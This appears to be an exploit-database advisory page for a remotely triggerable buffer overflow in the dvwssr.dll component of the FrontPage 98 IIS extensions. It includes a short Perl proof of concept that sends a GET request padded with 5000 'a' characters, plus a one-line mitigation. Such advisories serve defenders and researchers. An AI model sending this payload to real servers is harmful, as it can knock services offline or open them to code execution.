header-logo
Suggest Exploit
vendor:
FrontPage 98
by:
SecurityFocus
7.5
CVSS
HIGH
Buffer Overflow
119
CWE
Product Name: FrontPage 98
Affected Version From: FrontPage 98
Affected Version To: NT Option Pack
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
1998

Buffer Overflow in dvwssr.dll

The dvwssr.dll included with the FrontPage 98 extensions for IIS and shipped as part of the NT Option Pack has a remotely exploitable buffer overflow. This attack will result in the service no longer accepting connections and may allow for remote code execution on the vulnerable host. The exploit code sends a GET request with a string of 5000 'a's to the dvwssr.dll file.

Mitigation:

Upgrade to the latest version of the dvwssr.dll file.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/1109/info

The dvwssr.dll included with the FrontPage 98 extensions for IIS and shipped as part of the NT Option Pack has a remotely exploitable buffer overflow. This attack will result in the service no longer accepting connections and may allow for remote code execution on the vulnerable host. 


#!/usr/bin/perl
print "GET /_vti_bin/_vti_aut/dvwssr.dll?";
print "a" x 5000;
print " HTTP/1.1\nHost: yourhost\n\n";

Navigation

Suggest Exploit

Services By CQR